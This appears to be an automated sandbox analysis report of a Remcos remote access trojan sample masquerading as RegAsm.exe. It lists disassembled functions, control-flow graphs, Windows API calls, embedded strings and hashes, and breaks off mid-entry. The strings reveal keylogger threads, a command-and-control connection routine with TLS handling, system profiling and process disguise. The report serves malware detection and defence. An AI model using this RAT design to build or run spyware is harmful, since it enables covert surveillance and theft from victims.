                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
              • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
              • API String ID: 2830904901-1084268468
              • Opcode ID: 898fc42a08711b1fc07b96e79a6387ecb524032f91657ecf64c21f014e13491f
              • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
              • Opcode Fuzzy Hash: 898fc42a08711b1fc07b96e79a6387ecb524032f91657ecf64c21f014e13491f
              • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
              Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 583 415aa3-415ab5 call 404e26 call 4021fa 561->583 566->583 584 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->584 567->583 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 583->597 598 415add-415ae5 call 401e8d 583->598 648 415380-41538d call 405aa6 584->648 649 415392-4153b9 call 401fab call 4135a6 584->649 597->598 598->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 906 415a21-415a23 902->906 904 415a33-415a38 call 40b051 903->904 905 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->905 904->905 917 415a71-415a7d CreateThread 905->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 905->918 906->903 917->918 918->583
              APIs
              • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
              • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
              • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Sleep$ErrorLastLocalTime
              • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
              • API String ID: 524882891-4102665942
              • Opcode ID: 81c5a98812ea8a0caa0e97c4631378a6ab0cc3ec579a2ca142f0814394a5abfa
              • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
              • Opcode Fuzzy Hash: 81c5a98812ea8a0caa0e97c4631378a6ab0cc3ec579a2ca142f0814394a5abfa
              • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
              Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 925 414d86-414dc2 926 414dc8-414ddd GetSystemDirectoryA 925->926 927 414edd-414ee8 925->927 928 414ed3 926->928 929 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 926->929 928->927 934 414e31-414e3b GetProcAddress 929->934 935 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 929->935 936 414e42-414e44 934->936 937 414e3d-414e40 FreeLibrary 934->937 947 414e82-414e8c GetProcAddress 935->947 948 414ecf-414ed2 935->948 936->935 939 414e97 936->939 937->936 942 414e99-414eaa GetProcAddress 939->942 944 414eb4-414eb7 FreeLibrary 942->944 945 414eac-414eb0 942->945 946 414eb9-414ebb 944->946 945->942 949 414eb2 945->949 946->948 950 414ebd-414ecd 946->950 951 414e93-414e95 947->951 952 414e8e-414e91 FreeLibrary 947->952 948->928 949->946 950->948 950->950 951->939 951->948 952->951
              APIs
              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
              • LoadLibraryA.KERNEL32(?), ref: 00414E17
              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
              • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
              • LoadLibraryA.KERNEL32(?), ref: 00414E76
              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
              • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
              • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
              • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Library$AddressFreeProc$Load$DirectorySystem
              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
              • API String ID: 2490988753-744132762
              • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
              • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
              • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
              • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
              Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • Sleep.KERNEL32(00001388), ref: 0040A740
                • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
              • String ID: 8SG$8SG$pQG$pQG$PG$PG
              • API String ID: 3795512280-1152054767
              • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
              • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
              • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
              • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
              Function 0040ACD6 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 156sleepnetworkCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • __Init_thread_footer.LIBCMT ref: 0040AD38
              • Sleep.KERNEL32(000001F4), ref: 0040AD43
              • GetForegroundWindow.USER32 ref: 0040AD49
              • GetWindowTextLengthW.USER32 ref: 0040AD52
              • WSAGetQOSByName.WS2_32 ref: 0040AD64
              • GetWindowTextW.USER32 ref: 0040AD86
              • Sleep.KERNEL32(000003E8), ref: 0040AE54
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthName
              • String ID: [${ User has been idle for $ minutes }$]
              • API String ID: 3514005306-3954389425
              • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
              • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
              • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
              • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
              Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1129 4048c8-4048e8 connect 1130 404a1b-404a1f 1129->1130 1131 4048ee-4048f1 1129->1131 1134 404a21-404a2f WSAGetLastError 1130->1134 1135 404a97 1130->1135 1132 404a17-404a19 1131->1132 1133 4048f7-4048fa 1131->1133 1136 404a99-404a9e 1132->1136 1137 404926-404930 call 420c60 1133->1137 1138 4048fc-404923 call 40531e call 402093 call 41b4ef 1133->1138 1134->1135 1139 404a31-404a34 1134->1139 1135->1136 1148 404941-40494e call 420e8f 1137->1148 1149 404932-40493c 1137->1149 1138->1137 1141 404a71-404a76 1139->1141 1142 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1139->1142 1145 404a7b-404a94 call 402093 * 2 call 41b4ef 1141->1145 1142->1135 1145->1135 1161 404950-404973 call 402093 * 2 call 41b4ef 1148->1161 1162 404987-404992 call 421a40 1148->1162 1149->1145 1191 404976-404982 call 420ca0 1161->1191 1174 4049c4-4049d1 call 420e06 1162->1174 1175 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1162->1175 1188 4049d3-4049f6 call 402093 * 2 call 41b4ef 1174->1188 1189 4049f9-404a14 CreateEventW * 2 1174->1189 1175->1191 1188->1189 1189->1132 1191->1135
              APIs
              • connect.WS2_32(?,?,?), ref: 004048E0
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
              • WSAGetLastError.WS2_32 ref: 00404A21
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CreateEvent$ErrorLastLocalTimeconnect
              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
              • API String ID: 994465650-2151626615
              • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
              • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
              • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
              • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
              Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1204 40da34-40da59 call 401f86 1207 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1204->1207 1208 40da5f 1204->1208 1229 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1207->1229 1210 40da70-40da7e call 41b5b4 call 401f13 1208->1210 1211 40da91-40da96 1208->1211 1212 40db51-40db56 1208->1212 1213 40daa5-40daac call 41bfb7 1208->1213 1214 40da66-40da6b 1208->1214 1215 40db58-40db5d 1208->1215 1216 40da9b-40daa0 1208->1216 1217 40db6e 1208->1217 1218 40db5f-40db6c call 43c0cf 1208->1218 1238 40da83 1210->1238 1220 40db73 call 43c0cf 1211->1220 1212->1220 1230 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1213->1230 1231 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1213->1231 1214->1220 1215->1220 1216->1220 1217->1220 1218->1217 1232 40db79-40db7e call 409057 1218->1232 1233 40db78 1220->1233 1230->1238 1243 40da87-40da8c call 401f09 1231->1243 1232->1207 1233->1232 1238->1243 1243->1207
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: LongNamePath
              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
              • API String ID: 82841172-425784914
              • Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
              • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
              • Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
              • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
              Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1303 44ac49-44ac62 1304 44ac64-44ac74 call 446766 1303->1304 1305 44ac78-44ac7d 1303->1305 1304->1305 1312 44ac76 1304->1312 1307 44ac7f-44ac87 1305->1307 1308 44ac8a-44acae MultiByteToWideChar 1305->1308 1307->1308 1310 44acb4-44acc0 1308->1310 1311 44ae41-44ae54 call 434fcb 1308->1311 1313 44ad14 1310->1313 1314 44acc2-44acd3 1310->1314 1312->1305 1316 44ad16-44ad18 1313->1316 1317 44acd5-44ace4 call 457190 1314->1317 1318 44acf2-44ad03 call 446137 1314->1318 1321 44ae36 1316->1321 1322 44ad1e-44ad31 MultiByteToWideChar 1316->1322 1317->1321 1331 44acea-44acf0 1317->1331 1318->1321 1328 44ad09 1318->1328 1326 44ae38-44ae3f call 435e40 1321->1326 1322->1321 1325 44ad37-44ad49 call 448bb3 1322->1325 1333 44ad4e-44ad52 1325->1333 1326->1311 1332 44ad0f-44ad12 1328->1332 1331->1332 1332->1316 1333->1321 1335 44ad58-44ad5f 1333->1335 1336 44ad61-44ad66 1335->1336 1337 44ad99-44ada5 1335->1337 1336->1326 1340 44ad6c-44ad6e 1336->1340 1338 44ada7-44adb8 1337->1338 1339 44adf1 1337->1339 1341 44add3-44ade4 call 446137 1338->1341 1342 44adba-44adc9 call 457190 1338->1342 1343 44adf3-44adf5 1339->1343 1340->1321 1344 44ad74-44ad8e call 448bb3 1340->1344 1348 44ae2f-44ae35 call 435e40 1341->1348 1359 44ade6 1341->1359 1342->1348 1357 44adcb-44add1 1342->1357 1347 44adf7-44ae10 call 448bb3 1343->1347 1343->1348 1344->1326 1356 44ad94 1344->1356 1347->1348 1360 44ae12-44ae19 1347->1360 1348->1321 1356->1321 1361 44adec-44adef 1357->1361 1359->1361 1362 44ae55-44ae5b 1360->1362 1363 44ae1b-44ae1c 1360->1363 1361->1343 1364 44ae1d-44ae2d WideCharToMultiByte 1362->1364 1363->1364 1364->1348 1365 44ae5d-44ae64 call 435e40 1364->1365 1365->1326
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
              • __alloca_probe_16.LIBCMT ref: 0044ACDB
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
              • __alloca_probe_16.LIBCMT ref: 0044ADC0
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
              • __freea.LIBCMT ref: 0044AE30
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • __freea.LIBCMT ref: 0044AE39
              • __freea.LIBCMT ref: 0044AE5E
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
              • String ID:
              • API String ID: 3864826663-0
              • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
              • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
              • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
              • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
              Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1403 41c3f1-41c402 1404 41c404-41c407 1403->1404 1405 41c41a-41c421 1403->1405 1406 41c410-41c418 1404->1406 1407 41c409-41c40e 1404->1407 1408 41c422-41c43b CreateFileW 1405->1408 1406->1408 1407->1408 1409 41c441-41c446 1408->1409 1410 41c43d-41c43f 1408->1410 1412 41c461-41c472 WriteFile 1409->1412 1413 41c448-41c456 SetFilePointer 1409->1413 1411 41c47f-41c484 1410->1411 1415 41c474 1412->1415 1416 41c476-41c47d CloseHandle 1412->1416 1413->1412 1414 41c458-41c45f CloseHandle 1413->1414 1414->1410 1415->1416 1416->1411
              APIs
              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
              • CloseHandle.KERNEL32(00000000), ref: 0041C459
              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
              • CloseHandle.KERNEL32(00000000), ref: 0041C477
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandle$CreatePointerWrite
              • String ID: hpF
              • API String ID: 1852769593-151379673
              • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
              • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
              • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
              • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
              Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1417 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1428 41b35d-41b366 1417->1428 1429 41b31c-41b347 call 4135a6 call 401fab StrToIntA 1417->1429 1431 41b368-41b36d 1428->1431 1432 41b36f 1428->1432 1439 41b355-41b358 call 401fd8 1429->1439 1440 41b349-41b352 call 41cf69 1429->1440 1433 41b374-41b37f call 40537d 1431->1433 1432->1433 1439->1428 1440->1439
              APIs
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
              • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCurrentOpenProcessQueryValue
              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
              • API String ID: 1866151309-2070987746
              • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
              • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
              • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
              • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
              Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
              • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
              • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseCreateHandleSizeSleep
              • String ID: XQG
              • API String ID: 1958988193-3606453820
              • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
              • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
              • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
              • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
              Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CountEventTick
              • String ID: !D@$NG
              • API String ID: 180926312-2721294649
              • Opcode ID: ebd61020a37b9220784ff29151858ac03b19ee77db9fcefbed30365d3bd7595e
              • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
              • Opcode Fuzzy Hash: ebd61020a37b9220784ff29151858ac03b19ee77db9fcefbed30365d3bd7595e
              • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
              Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread$LocalTimewsprintf
              • String ID: Offline Keylogger Started
              • API String ID: 465354869-4114347211
              • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
              • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
              • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
              • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
              Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
              Download Yara Rule
              APIs
